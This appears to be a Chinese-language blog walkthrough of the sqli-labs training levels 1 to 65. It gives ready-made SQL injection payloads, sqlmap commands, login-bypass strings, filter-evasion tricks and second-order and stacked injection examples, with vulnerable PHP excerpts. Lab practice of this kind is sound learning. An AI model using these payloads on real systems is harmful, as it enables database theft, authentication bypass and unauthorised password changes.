SQL注入进阶篇-sql-labs合集

工具

HackBar

BurpSuite v2.1

目录

基础挑战

Less-1

联合查询

报错注入(一)

布尔盲注

延时注入

sqlmap

Less-2

Less-3

Less-4

Less-5

Less-6

Less-6

Less-7

Less-8

Less-9

Less-10

Less-11

联合查询

报错注入

布尔盲注

延时注入

sqlmap

万能密码

 Less-12

Less-13

Less-14

Less-15

Less-16

Less-17

代码审计

Less-18

Less-19

Less-20

 Less-21

Less-22

高级注入 

Less-23 

Less-24

源码分析

攻击思路

Less-25

源码分析

Less-25a

Less-26

过滤规则

Less-26a

Less-27

过滤规则

Less-27a

Less-28

过滤规则

Less-28a

Less-29

Less-30

Less-31

Less-32

源码分析

Less-33

源码分析

Less-34

Less-35

源码分析

Less-36

源码分析

Less-37

叠加注入

Less-38

Less-39

Less-40

Less-41

Less-42

源码分析

Less-43

Less-44

Less-45

Less-46

验证

报错注入

布尔盲注

延时注入

Less-47

Less-48

Less-49

Less-50

Less-51

Less-52

Less-53

进阶挑战

Less-54

测试

查表名

查字段名

拿到key

提交key

Less-55

测试

Less-56

测试

Less-57

测试

Less-58

源码分析

测试

Less-59

Less-60

Less-61

Less-62

Less-63

Less-64

Less-65


基础挑战

Less-1

下面我将以第一关为例,使用四种注入手法

联合查询

http://114.55.107.51/sqli-labs/Less-1/?id=-1' union select 1,2,3--+

查表

…select table_name from information_schema.tables where table_schema=database() limit 3,1…

查表中字段

…select column_name from information_schema.columns where table_name = users and table_schema = database() limit 1,1…

查数据

…select group_concat(username,id,password) from users…

SQL注入进阶篇-sql-labs合集_第1张图片

 

报错注入(一)

http://192.168.1.200/sqli-labs/Less-1/?id=1' and (select 1 from (select count(*),concat((select concat(username,password) from users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)--+

… and updatexml(1,concat('^',version(),'^'),1)--+

SQL注入进阶篇-sql-labs合集_第2张图片

布尔盲注

http://192.168.1.200/sqli-labs/Less-1/?id=1' and length(database())=8--+

SQL注入进阶篇-sql-labs合集_第3张图片

延时注入

http://114.55.107.51/sqli-labs/Less-1/?id=1' and sleep(4)--+

?id=1' and if(length(database())=8,1,sleep(5))--+

SQL注入进阶篇-sql-labs合集_第4张图片

sqlmap

联合查询注入

sqlmap -u "http://192.168.1.200/sqli-labs/Less-1/?id=1" --dbms=MySQL --random-agent --flush-session --technique=U -v 3 --dbs

报错注入

sqlmap -u "http://192.168.1.200/sqli-labs/Less-1/?id=1" --dbms=MySQL --random-agent --flush-session --technique=E -v 3 --dbs

布尔盲注

sqlmap -u "http://192.168.1.200/sqli-labs/Less-1/?id=1" --dbms=MySQL --random-agent --flush-session --technique=B -v 3 --dbs

延时注入

sqlmap -u "http://192.168.1.200/sqli-labs/Less-1/?id=1" --dbms=MySQL --random-agent --flush-session --technique=T -v 3 --dbs

Less-2

请求方式 get

闭合方式 无闭合

攻击测试 ?id=-1 union select 1,2,version()--+

注入方式 联合,报错,布尔,延时

Less-3

请求方式 get

闭合方式 ')

攻击测试  ?id=-1') union select 1,2,version()--+

注入方式 联合,报错,布尔,延时

Less-4

请求方式 get

闭合方式 ")

攻击测试  ?id=-1") union select 1,2,version()--+

注入方式 联合,报错,布尔,延时

Less-5

请求方式 get

闭合方式 '

攻击测试  ?id=1' and updatexml(1,concat('^',version(),'^'),1)--+

注入方式 报错,布尔,延时

 

Less-6

请求方式 get

闭合方式 "

攻击测试  ?id=1" and updatexml(1,concat('^',version(),'^'),1)--+

注入方式 报错,布尔,延时

Less-6

请求方式 get

闭合方式 "

攻击测试  ?id=1" and updatexml(1,concat('^',version(),'^'),1)--+

注入方式 报错,布尔,延时

Less-7

请求方式 get

闭合方式 '))

攻击测试  ?id=1')) and 1=2--+

注入方式 布尔,延时

Less-8

请求方式 get

闭合方式 '

攻击测试  ?id=1' and 1=2--+

注入方式 布尔,延时

Less-9

请求方式 get

闭合方式 '

攻击测试  ?id=1' and sleep(4)--+

注入方式 延时

Less-10

请求方式 get

闭合方式 "

攻击测试  ?id=1" and sleep(4)--+

注入方式 延时

Less-11

请求方式 post

闭合方式 '

注入方式

POST 数据里面不能有 +,故'--+'改为'-- '

联合查询

uname=-1' union select 1,version()#&passwd=&submit=Submit

SQL注入进阶篇-sql-labs合集_第5张图片

报错注入

uname=1' and updatexml(1,concat('^',version(),'^'),1)-- &passwd=&submit=Submit

SQL注入进阶篇-sql-labs合集_第6张图片

布尔盲注

uname=admin' and length(database())=8#&passwd=&submit=Submit

由于这里我们要通过是否登录成功来判断布尔状态,如果后面字段的值为真,登录成功,否则登录失败

SQL注入进阶篇-sql-labs合集_第7张图片

延时注入

uname=admin' and if(length(database())=8,1,sleep(5))#&passwd=&submit=Submit

SQL注入进阶篇-sql-labs合集_第8张图片

sqlmap

创建post.txt 文件

使用bp抓包,获取http请求数据包

SQL注入进阶篇-sql-labs合集_第9张图片

联合注入

sqlmap -r post.txt --dbms=MySQL --random-agent --flush-session --technique=U -v 3

报错注入

sqlmap -r post.txt --dbms=MySQL --random-agent --flush-session --technique=E -v 3

布尔盲注

sqlmap -r post.txt --dbms=MySQL --random-agent --flush-session --technique=B -v 3

延时注入

sqlmap -r post.txt --dbms=MySQL --random-agent --flush-session --technique=T -v 3

万能密码

法一:

uname=admin'-- &passwd=admin&submit=Submit

uname=admin'#&passwd=&submit=Submit

法二:

uname=admin&passwd=1' or 1-- &submit=Submit

uname=admin&passwd=1'||1-- &submit=Submit

uname=admin&passwd=1' or 1#&submit=Submit

uname=admin&passwd=1'||1#&submit=Submit

法三:

uname=admin&passwd=1'or'1'='1&submit=Submit

uname=admin&passwd=1'||'1'='1&submit=Submit

 Less-12

请求方式 post

闭合方式 ")

攻击测试 uname=-1") union select 1,version()#&passwd=&submit=Submit

注入方式 联合,报错,布尔,延时

Less-13

请求方式 post

闭合方式 ')

攻击测试 uname=1') and updatexml(1,concat('^',version(),'^'),1)#&passwd=&submit=Submit

注入方式 报错,布尔,延时

Less-14

请求方式 post

闭合方式 "

攻击测试 uname=1" and updatexml(1,concat('^',version(),'^'),1)#&passwd=&submit=Submit

注入方式 报错,布尔,延时

Less-15

请求方式 post

闭合方式 '

攻击测试 uname=admin' and 1=2#&passwd=&submit=Submit

注入方式 布尔,延时

Less-16

请求方式 post

闭合方式 ")

攻击测试 uname=admin") and sleep(4)#&passwd=&submit=Submit

注入方式 延时

Less-17

代码审计

$uname=check_input($_POST['uname']); 
$passwd=$_POST['passwd'];

// connectivity
@$sql="SELECT username, password FROM users WHERE username= $uname LIMIT 0,1";

$result=mysql_query($sql);
$row = mysql_fetch_array($result);

if($row)
{
  $row1 = $row['username'];          
$update="UPDATE users SET password = '$passwd' WHERE username='$row1'";
mysql_query($update);

发现只要输入正确的用户名,passwd字段就可以进行注入

请求方式 post

闭合方式 '

攻击测试 uname=admin&passwd=1' and updatexml(1,concat('^',database(),'^'),1)#&submit=Submit

注入方式 报错

Less-18

请求方式 post

闭合方式 '

注入方式 报错

注入点 U-A字段

SQL注入进阶篇-sql-labs合集_第10张图片

SQL注入进阶篇-sql-labs合集_第11张图片

Less-19

请求方式 post

闭合方式 '

注入方式 报错

注入点 referer字段

SQL注入进阶篇-sql-labs合集_第12张图片

 

SQL注入进阶篇-sql-labs合集_第13张图片

Less-20

请求方式 post

闭合方式 '

注入方式 联合,报错,布尔,延时

注入点 cookie字段

攻击测试 1' union select 1,2,version()#

SQL注入进阶篇-sql-labs合集_第14张图片

如何抓取cookie包

1、首先开启bp代理模式,输入正确的用户名密码登录[admin:admin]

2、使用bp抓包,将第一个post请求(携带账户面密码)的包放过

3、等待一会,带有cookie的包会自动出现

 Less-21

请求方式 post

闭合方式 ')

注入方式 联合,报错,布尔,延时

注入点 cookie字段(经过Base-64编码)

攻击测试 1' union select 1,2,version()#

Base-64编码之后 dW5hbWU9MScpIHVuaW9uIHNlbGVjdCAxLDIsdmVyc2lvbigpIw==

SQL注入进阶篇-sql-labs合集_第15张图片

Less-22

请求方式 post

闭合方式 "

注入方式 报错,布尔,延时

注入点 cookie字段(经过Base-64编码)

攻击测试 1" and updatexml(1,concat('^',database(),'^'),1)#

Base-64编码之后 MSIgYW5kIHVwZGF0ZXhtbCgxLGNvbmNhdCgnXicsZGF0YWJhc2UoKSwnXicpLDEpIw==

SQL注入进阶篇-sql-labs合集_第16张图片

高级注入 

Less-23 

if(isset($_GET['id']))
{
$id=$_GET['id'];

//过滤# 和 --+
$reg = "/#/";
$reg1 = "/--/";
$replace = "";
$id = preg_replace($reg, $replace, $id);
$id = preg_replace($reg1, $replace, $id);

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);
if($row)
{        
          echo 'Your Login name:'. $row['username'];
          echo 'Your Password:' .$row['password'];
}

请求方式 get

闭合方式 '

攻击测试 ?id=-1' union select 1,version(),3 and '1'='1

注入方式 联合,报错,布尔,延时

SQL注入进阶篇-sql-labs合集_第17张图片

Less-24

二次注入问题

二次注入 简单概括就是黑客精心构造 SQL 语句插入到数据库中,数据库的信息被其他类型的 SQL 语句调用的时候触发攻击行为。因为第一次黑客插入到数据库的时候并没有触发危害性,而是再其他语句调用的时候才会触发攻击行为,这个就是二次注入。

源码分析

login.php

$username = mysql_real_escape_string($_POST["login_user"]);

$password = mysql_real_escape_string($_POST["login_password"]);

$sql = "SELECT * FROM users WHERE username='$username' and password='$password'";

$res = mysql_query($sql) or die('You tried to be real smart, Try harder!!!! :( ');

$row = mysql_fetch_row($res);

if ($row[1]) {

return $row[1];

}

index.php

if (isset($_SESSION['username']) && isset($_COOKIE['Auth'])) {

   header('Location: logged-in.php');

}

logged-in.php

if (!isset($_COOKIE["Auth"])){
if (!isset($_SESSION["username"])){
                   header('Location: index.php');
}

header('Location: index.php');
}

new_user.php

login_create.php

//创建用户
$username=  mysql_escape_string($_POST['username']) ;
$pass= mysql_escape_string($_POST['password']);
$re_pass= mysql_escape_string($_POST['re_password']);

判断该用户是否已存在,若存在提示重新输入
$sql = "select count(*) from users where username='$username'";
$row = mysql_fetch_row($res);
if (!$row[0]== 0){
} else {
      if ($pass==$re_pass){
                   $sql = "insert into users ( username, password) values(\"$username\", \"$pass\")";
           }else{}

}

$username= $_SESSION["username"];
$curr_pass= mysql_real_escape_string($_POST['current_password']);
$pass= mysql_real_escape_string($_POST['password']);
$re_pass= mysql_real_escape_string($_POST['re_password']);

pass_change.php

if($pass==$re_pass){        
$sql = "UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass' ";
if($row==1){
echo "Password successfully updated";
}
else{

header('Location: failed.php');
}
}else{
header('refresh:2, url=index.php');
}

攻击思路

1、创建用户 【admin'#】

此时数据库

SQL注入进阶篇-sql-labs合集_第18张图片

2、以用户【admin'#】登录成功

3、修改密码,

UPDATE users SET PASSWORD='$pass' where username='$username' and password='$curr_pass'

此时更新密码的sql语句就变为

UPDATE users SET PASSWORD='$pass' where username='admin'#' nd password='$curr_pass'

此时实际上我们会将【admin】用户的密码修改

Less-25

源码分析

if(isset($_GET['id'])){
$id=$_GET['id'];
$id= blacklist($id);

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
$result=mysql_query($sql);
$row = mysql_fetch_array($result);

if($row){
         echo 'Your Login name:'. $row['username'];
         echo 'Your Password:' .$row['password'];
          }
else{
print_r(mysql_error());
    }
}


function blacklist($id){

$id= preg_replace('/or/i',"", $id);                        //strip out OR (non case sensitive)
$id= preg_replace('/AND/i',"", $id);                //Strip out AND (non case sensitive)
return $id;
}

这里过滤了 or 和 and

双写嵌套绕过

password 可写成 passwoorrd

and 可写成 aandnd

关键字替换

or -> ||

and -> &&

请求方式 get

闭合方式 '

攻击测试

?id=-1' union select 1,2,3--+

?id=1' aandnd 1=2--+

?id=1' aandnd updatexml(1,concat('^',database(),'^'),1)--+

注入方式 联合,报错,布尔,延时

Less-25a

和上一个类似

区别 闭合方式不同,没有报错信息输出

请求方式 get

闭合方式 数字型

攻击测试

?id=-1 union select 1,2,3--+

?id=1 aandnd 1=2--+

注入方式 联合,布尔,延时

Less-26

过滤规则

function blacklist($id)

{

$id= preg_replace('/or/i',"", $id);                        //strip out OR (non case sensitive)

$id= preg_replace('/and/i',"", $id);                //Strip out AND (non case sensitive)

$id= preg_replace('/[\/\*]/',"", $id);                //strip out /*

$id= preg_replace('/[--]/',"", $id);                //Strip out --

$id= preg_replace('/[#]/',"", $id);                        //Strip out #

$id= preg_replace('/[\s]/',"", $id);                //Strip out spaces

$id= preg_replace('/[\/\\\\]/',"", $id);                //Strip out 斜线

return $id;

}

请求方式 get

闭合方式 '

攻击测试 ?id=-1'%a0union%a0select%a01,2,3%a0aandnd%a0'1'='1

注入方式 联合,报错布尔,延时

Less-26a

请求方式 get

闭合方式 ')

攻击测试 ?id=-1')%a0union%a0select%a01,2,3%a0aandnd%a0'1'='1

注入方式 联合,报错,布尔,延时

Less-27

过滤规则

function blacklist($id){
$id= preg_replace('/[\/\*]/',"", $id);           //strip out /*
$id= preg_replace('/[--]/',"", $id);             //Strip out --.
$id= preg_replace('/[#]/',"", $id);              //Strip out #.
$id= preg_replace('/[ +]/',"", $id);             //Strip out spaces.
$id= preg_replace('/select/m',"", $id);          //Strip out spaces.
$id= preg_replace('/[ +]/',"", $id);             //Strip out spaces.
$id= preg_replace('/union/s',"", $id);           //Strip out union
$id= preg_replace('/select/s',"", $id);          //Strip out select
$id= preg_replace('/UNION/s',"", $id);           //Strip out UNION
$id= preg_replace('/SELECT/s',"", $id);          //Strip out SELECT
$id= preg_replace('/Union/s',"", $id);           //Strip out Union
$id= preg_replace('/Select/s',"", $id);          //Strip out select
return $id;
}

请求方式 get

闭合方式 '

攻击测试 ?id=-1'uniOn%0bsElect%0b1,2,3 ||'1

注入方式 联合,报错,布尔,延时

Less-27a

请求方式 get

闭合方式 "

攻击测试 ?id=-1"uniOn%0bsElect%0b1,2,3 ||'1

注入方式 联合,布尔,延时

Less-28

过滤规则

function blacklist($id){
$id= preg_replace('/[\/\*]/',"", $id);                        //strip out /*
$id= preg_replace('/[--]/',"", $id);                        //Strip out --.
$id= preg_replace('/[#]/',"", $id);                                //Strip out #.
$id= preg_replace('/[ +]/',"", $id);                            //Strip out spaces.
$id= preg_replace('/[ +]/',"", $id);                            //Strip out spaces.
$id= preg_replace('/union\s+select/i',"", $id);              //Strip out UNION & SELECT.
return $id;
}

这里过滤了空格可以使用前面的编码绕过,过滤了注释,可使用闭合绕过,过滤了UNION+SELECT可以使用双写嵌套绕过也可以使用编码代替+

请求方式 get

闭合方式 ')

攻击测试 ?id=-1') union%0bselect%0b1,2,3 ||('1')=('2

注入方式 联合,布尔,延时

Less-28a

过滤规则比上一个还少

请求方式 get

闭合方式 ')

攻击测试 ?id=-1') union%0bselect%0b1,2,3 ||('1')=('2

注入方式 联合,布尔,延时

Less-29

index.php

if(isset($_GET['id'])){
$id=$_GET['id'];

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";
if($row){
          echo 'Your Login name:'. $row['username'];
          echo 'Your Password:' .$row['password'];
          }
else{
print_r(mysql_error());
    }
}

分析代码就是简单sql模型,直接联合走一波

payload

?id=-1' union select 1,2,(select group_concat(username,password) from users)--+

login.php

if(isset($_GET['id'])){
$qs = $_SERVER['QUERY_STRING']; //获取?后面的值
$hint=$qs;
$id1=java_implimentation($qs);

$id=$_GET['id'];
//再次过滤检查
whitelist($id1);

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

if($row){
          echo 'Your Login name:'. $row['username'];
          echo 'Your Password:' .$row['password'];
          }else {
print_r(mysql_error());
}
}

function java_implimentation($query_string){
$q_s = $query_string;
// & 作为分隔符,分割字符串
$qs_array= explode("&",$q_s);
// 遍历数组
foreach($qs_array as $key => $value)
}

$val=substr($value,0,2);

//如果前两位是id

if($val=="id"){

//截取3-30位作为id的值
$id_value=substr($value,3,30);
return $id_value;
break;
}

function whitelist($input){
//过滤规则 检测数字
$match = preg_match("/^\d+$/", $input);
if($match){}
else{        
//不符合规则
header('Location: hacked.php');
    }
}

我们发现有两次过滤whitelist和java_implimentation

whitelist 过滤是比较严格的,如果 id 不是数字的话就会直接重定向到 hacked.php,这里是没问题的,0而问题出在了前面的函数java_implimentation($qs)

分析其逻辑,发现在检测道第一个id的时候,因为 return 表示了函数的结束运行,所以这个函数捕捉到 id 的时候就会返回 return $id_value,这样,如果我们还构造一组id的话,后面的 id 就会绕过函数检测。

请求方式 get

闭合方式 '

注入方式 联合,布尔,延时

payload

?id=1&id=-1' union select 1,2,(select group_concat(username,password) from users)--+

SQL注入进阶篇-sql-labs合集_第19张图片

Less-30

和上一关相似,只是闭合方式不同

请求方式 get

闭合方式 "

注入方式 联合,布尔,延时

index.php

payload

?id=-1" union select 1,2,(select group_concat(username,password) from users)--+

login.php

payload

?id=1&id=-1" union select 1,2,(select group_concat(username,password) from users)--+

Less-31

和上一关相似,只是闭合方式不同

请求方式 get

闭合方式 ")

注入方式 联合,布尔,延时

index.php

payload

?id=-1") union select 1,2,(select group_concat(username,password) from users)--+

login.php

payload

?id=1&id=-1") union select 1,2,(select group_concat(username,password) from users)--+

Less-32

源码分析

if(isset($_GET['id'])){

$id=check_addslashes($_GET['id']);

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

}
//在 ' " / 敏感字符前加反斜杠
function check_addslashes($string){
    $string = preg_replace('/'. preg_quote('\\') .'/', "\\\\\\", $string);        
    $string = preg_replace('/\'/i', '\\\'', $string);                              
    $string = preg_replace('/\"/', "\\\"", $string);
    return $string;
}

通过分析,我们得知其防御措施是在特殊字符(' " /) 前加反斜杠,绕过姿势:

宽字节注入,使用%df 吃掉 \ 或 将 \' 中的 \ 过滤掉

请求方式 get

闭合方式 '

注入方式 联合,报错,布尔,延时

攻击测试

?id=-1%df' union select 1,2,(select group_concat(username,password) from users)--+

Less-33

源码分析

if(isset($_GET['id'])){
$id=check_addslashes($_GET['id']);

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

}
function check_addslashes($string){
    $string= addslashes($string);   
    return $string;
}

addslashes()函数作用将预定义字符 ' " \ 转义为 \' \" \\

和上题类似,使用宽字节绕过

请求方式 get

闭合方式 '

注入方式 联合,报错,布尔,延时

攻击测试

?id=-1%df' union select 1,2,(select group_concat(username,password) from users)--+

注:要想防御宽字节注入,在使用 addslashes()时,我们需要将 mysql_query 设置为 binary 的方式

Less-34

与上一题类似,只是请求方式有get变为post

请求方式 post

闭合方式 '

注入方式 联合,报错,布尔,延时

攻击测试

uname=%df' and 1=2 union select 1,(SELECT GROUP_CONCAT(username,password) FROM users)#&passwd=&submit=Submit

admin%df' and updatexml(1,concat('^',database(),'^'),1)#

SQL注入进阶篇-sql-labs合集_第20张图片

Less-35

源码分析

$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";

function check_addslashes($string){
    $string = addslashes($string);
    return $string;
}

注入方式数字型,这个防护方式就有点。。。

请求方式 get

闭合方式 数字型

注入方式 联合,报错,布尔,延时

攻击测试

?id=-1 union select 1,2,(select group_concat(username,password) from users)--+

Less-36

源码分析

$sql="SELECT * FROM users WHERE id='$id' LIMIT 0,1";

//转义危险字符 ' " / 为 /' /" //
function check_quotes($string){
    $string= mysql_real_escape_string($string);   
    return $string;
}

依然可以使用前面几关的思路,使用宽字节绕过

请求方式 get

闭合方式 '

注入方式 联合,报错,布尔,延时

攻击测试

?id=-1%df' union select 1,2,(select group_concat(username,password) from users)--+

Less-37

与上一关类似,只是请求方式发生变化

请求方式 post

闭合方式 '

注入方式 联合,报错,布尔,延时

攻击测试

uname=%df' and 1=2 union select 1,(select group_concat(username,password) from users)#&passwd=&submit=Submit

SQL注入进阶篇-sql-labs合集_第21张图片

叠加注入

Less-38

堆叠注入原因:mysqli_multi_query 函数用于执行一个 SQL 语句,或者多个使用分号分隔的 SQL 语句。这个就是堆叠注入产生的原因,因为本身就支持多个 SQL 语句。

请求方式 get

闭合方式 '

注入方式 联合,报错,布尔,延时,堆叠

攻击测试 ?id=-1' union select 1,2,version()--+

我们也可以使用以下payload来创建一个新用户

?id=1';insert into users(username,password) values ('hello','world');

SQL注入进阶篇-sql-labs合集_第22张图片

 

SQL注入进阶篇-sql-labs合集_第23张图片

Less-39

与38关类似,区别在于闭合方式为 数字型注入

请求方式 get

闭合方式 数字型

注入方式 联合,报错,布尔,延时,堆叠

Less-40

与38关类似,区别在于闭合方式不同

请求方式 get

闭合方式 ')

注入方式 联合,报错,布尔,延时,堆叠

 

Less-41

与39关类似,区别在于没有报错输出,不能使用报错注入

请求方式 get

闭合方式 数字型

注入方式 联合,布尔,延时,堆叠

Less-42

源码分析

其他几个文件没有什么有用的利用点,但是在login.php 中存在明显漏洞

虽然在pass_change.php中存在明显的二次注入漏洞,但是本题无法创建新用户,该漏洞自然无法利用了

login.php

$username = mysqli_real_escape_string($con1, $_POST["login_user"]);

$password = $_POST["login_password"];

这里面的password字段没有进行过滤,有报错输出,可以使用常规注入手法(联合,报错,布尔,延时)注入,而且还支持堆叠查询,也可使用堆叠注入

万能密码绕过

1' or 1#

请求方式 post

闭合方式 '

注入方式 联合,报错,布尔,延时,堆叠

攻击测试

login_user=admin&login_password=1' union select 1,version(),3#&mysubmit=Login

login_user=admin&login_password=1' and updatexml(1,concat('^',database(),'^'),1)#&mysubmit=Login

Less-43

与42关类似,只是拼接方式不同

请求方式 post

闭合方式 ')

注入方式 联合,报错,布尔,延时,堆叠

Less-44

与42关类似,只是拼接方式不同,且没有错误消息输出,无法使用报错在注入

请求方式 post

闭合方式 '

注入方式 联合,布尔,延时,堆叠

Less-45

与44关类似,只是拼接方式不同

请求方式 post

闭合方式 ')

注入方式 联合,布尔,延时,堆叠

Less-46

order by

与常规的where后的注入不同,order by无法使用union联合查询注入方式

验证

rand()验证

?sort=rand(1) 与 ?sort=rand(0)的结果时不一致的,利用这一点,我们可以构造布尔盲注和延时注入

延时验证

?sort=1 and sleep(4)

请求方式 get

闭合方式 数字型

注入方式 报错,布尔,延时

报错注入

利用order by重复键冲突

?sort=1 and (select 1 from (select count(*),concat((select version()),floor(rand(0)*2))x from information_schema.tables group by x)a)

利用 procedure analyse 参数,也可以执行报错注入

?sort=1 procedure analyse(extractvalue(rand(),concat(0x3a,version())),1)

布尔盲注

?sort=rand(length(database())=9)

延时注入

?sort=rand(if(length(database())=8,1,sleep(1)))

?sort=1 and if(length(database())=9,1,sleep(1))

Less-47

与46关类似,只是拼接方式不同

请求方式 get

闭合方式 '

注入方式 报错,布尔,延时

Less-48

与46关类似,只是少了报错输出,不能使用报错注入

请求方式 get

闭合方式 数字型

注入方式 布尔,延时

Less-49

与47关类似,只是少了报错输出,不能使用报错注入

请求方式 get

闭合方式 '

注入方式 布尔,延时

Less-50

与46关类似,只是询方式由 mysql_query 变成了 mysqli_multi_query,可以使用堆叠注入

请求方式 get

闭合方式 数字型

注入方式 报错,布尔,延时,堆叠

Less-51

与50关类似,只是拼接方式不同

请求方式 get

闭合方式 '

注入方式 报错,布尔,延时,堆叠

Less-52

与50关类似,只是少了报错输出,不能使用报错注入

请求方式 get

闭合方式 数字型

注入方式 布尔,延时,堆叠

Less-53

与51关类似,只是少了报错输出,不能使用报错注入

请求方式 get

闭合方式 '

注入方式 布尔,延时,堆叠

进阶挑战

Less-54

请求方式 get

闭合方式 '

注入方式 联合,报错,布尔,延时

限定了注入次数为10次

测试

?id=-1' union select 1,2,3--+

SQL注入进阶篇-sql-labs合集_第24张图片

查表名

?id=-1' union select 1,(select group_concat(table_name separator 0x3c62723e) from information_schema.tables where table_schema=database()),database()--+

SQL注入进阶篇-sql-labs合集_第25张图片

查的表:1mwm7h77nb(表名随机)

查字段名

?id=-1' union select 1,(select group_concat(column_name separator 0x3c62723e) from information_schema.columns where table_schema=database() and table_name='1mwm7h77nb'),3--+

SQL注入进阶篇-sql-labs合集_第26张图片

得到表中字段值:id,sessid,secret_BKSM,tryy

拿到key

?id=-1' union select 1,(select secret_BKSM from 1mwm7h77nb),3--+

SQL注入进阶篇-sql-labs合集_第27张图片

拿到key值:AoGFcuhtdypPohxGFJxRWXBO

提交key

SQL注入进阶篇-sql-labs合集_第28张图片

Less-55

测试

?id=-1) union select 1,2,3--+

与上一关类似,区别在于闭合方式不同

Less-56

测试

?id=-1') union select 1,2,3--+

与上一关类似,区别在于闭合方式不同

Less-57

测试

?id=-1" union select 1,2,3--+

与上一关类似,区别在于闭合方式不同

Less-58

源码分析

$unames=array("Dumb","Angelina","Dummy","secure","stupid","superman","batman","admin","admin1","admin2","admin3","dhakkan","admin4");

$pass = array_reverse($unames);

echo 'Your Login name : '. $unames[$row['id']];

echo 'Your Password : ' .$pass[$row['id']];

print_r(mysql_error());   //可以进行报错注入

对输出做了调整,使用联合查询注入得不到我们想要的信息了

请求方式 get

闭合方式 '

注入方式 报错,布尔,延时

测试

?id=1' and updatexml(1,concat('^',database(),'^'),1)--+

SQL注入进阶篇-sql-labs合集_第29张图片

其他的与54关类似

Less-59

和58关类似,只是闭合方式不一样

请求方式 get

闭合方式 数字型

注入方式 报错,布尔,延时

测试

?id=1 and updatexml(1,concat('^',database(),'^'),1)--+

Less-60

和58关类似,只是闭合方式不一样

请求方式 get

闭合方式 ")

注入方式 报错,布尔,延时

测试

?id=1") and updatexml(1,concat('^',database(),'^'),1)--+

Less-61

和58关类似,只是闭合方式不一样

请求方式 get

闭合方式 '))

注入方式 报错,布尔,延时

测试

?id=1')) and updatexml(1,concat('^',database(),'^'),1)--+

Less-62

没有了报错输出,报错注入失效,只能使用布尔和延时了,这里的具体攻击手法我就不做过多赘述了,当然这里使用工具跑才是最省事的了

请求方式 get

闭合方式 ')

注入方式 布尔,延时

Less-63

和62关类似,只是闭合方式不一样

请求方式 get

闭合方式 '

注入方式 布尔,延时

Less-64

和62关类似,只是闭合方式不一样

请求方式 get

闭合方式 ))

注入方式 布尔,延时

Less-65

和62关类似,只是闭合方式不一样

请求方式 get

闭合方式 ")

注入方式 布尔,延时

 

以前一直没有刷完的题目,通过写博客的方式就逼自己一把刷完了,效果显著 2333,这种学习记录贴会长期记录下去的。实际上 sqlmap 也很强大,尤其是在盲注这一块效率比手工要快很多,但是手工注入的重要性也是无可替代的,还是系统的学习掌握一下的,手工注入在存在联合和报错注入的情况下,注入速度也是不低于 sqlmap 的。


参考资料

SQL注入天书

https://www.sqlsec.com/2020/05/sqlilabs.html#toc-heading-78

你可能感兴趣的:(渗透测试,靶机实战,数据库,mysql,安全,php)